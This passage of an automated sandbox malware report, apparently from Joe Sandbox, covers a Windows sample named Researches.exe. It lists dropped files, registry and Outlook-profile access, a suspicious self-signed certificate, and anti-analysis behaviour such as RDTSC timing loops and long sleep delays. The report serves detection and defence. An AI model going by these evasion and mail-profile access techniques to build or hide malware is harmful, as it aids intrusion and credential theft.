          Source: C:\Users\user\Desktop\Researches.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: stempelpudernes.lnk.0.drLNK file: ..\Pictures\muringerne\giggliest.pha
          Source: dinosaurusserne.lnk.0.drLNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre
          Source: C:\Users\user\Desktop\Researches.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Nonideological\indberegne.iniJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.2951909943.0000000003D3A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2F2C0 push esi; retf 11_2_02D2F2CE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D25370 push edi; retf 11_2_02D2537E
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2F180 push esi; retf 11_2_02D2F18E
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D226A0 push ebp; retf 11_2_02D226AE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D227F0 push esi; retf 11_2_02D227FE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D207E0 push edi; retf 11_2_02D207EA
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D217E7 push esp; retf 11_2_02D217F6
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D207EB push edi; retf 11_2_02D207FA
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D22790 push esi; retf 11_2_02D227FE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D225B0 push ebp; retf 11_2_02D225BE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2D548 push esi; retf 11_2_02D2D556
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D20838 push edi; retf 11_2_02D207FA
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D21928 push esp; retf 11_2_02D21936
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CFAA push edi; retf 11_2_02D2CFB6
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D2CCD8 push edi; retf 11_2_02D2CCE6
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_02D21DF1 push esp; retf 11_2_02D21DFE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36824198 push esp; retf 11_2_36824199
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_369A97EE push 8B50369Ah; iretd 11_2_369A97F3

          Persistence and Installation Behavior

          barindex
          Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Hypnotize' is not a legitimate company name and appears suspicious. 3) Email domain 'Panikslagnes.Sma' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible tampering. 5) The OU field 'Uninfectiousness Languorousness' contains nonsensical terms that no legitimate business would use. 6) While the country code DE (Germany) is generally trustworthy, the combination with other suspicious elements suggests an attempt to appear legitimate. The certificate was created recently (2024) but fails validation, which is a strong indicator of malicious intent.
          Source: C:\Users\user\Desktop\Researches.exeFile created: C:\Users\user\AppData\Local\Temp\nsh721B.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Researches.exeAPI/Special instruction interceptor: Address: 42A180B
          Source: C:\Users\user\Desktop\Researches.exeAPI/Special instruction interceptor: Address: 27E180B
          Source: C:\Users\user\Desktop\Researches.exeRDTSC instruction interceptor: First address: 427CF40 second address: 427CF40 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6D94B76E68h 0x00000006 test dh, bh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\Researches.exeRDTSC instruction interceptor: First address: 27BCF40 second address: 27BCF40 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6D94E84B18h 0x00000006 test dh, bh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\Researches.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeMemory allocated: 33650000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeMemory allocated: 33460000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599655Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598734Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598625Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598406Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598287Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597469Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597358Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597249Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597029Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596922Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596702Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596516Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596390Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596081Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595953Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595844Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595391Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595281Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595172Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595063Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594938Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeWindow / User API: threadDelayed 8014Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeWindow / User API: threadDelayed 1819Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh721B.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Researches.exeAPI coverage: 1.9 %
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7088Thread sleep count: 8014 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7088Thread sleep count: 1819 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599655s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599438s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -599078s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598969s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598734s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598625s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598406s >= -30000sJump to behavior
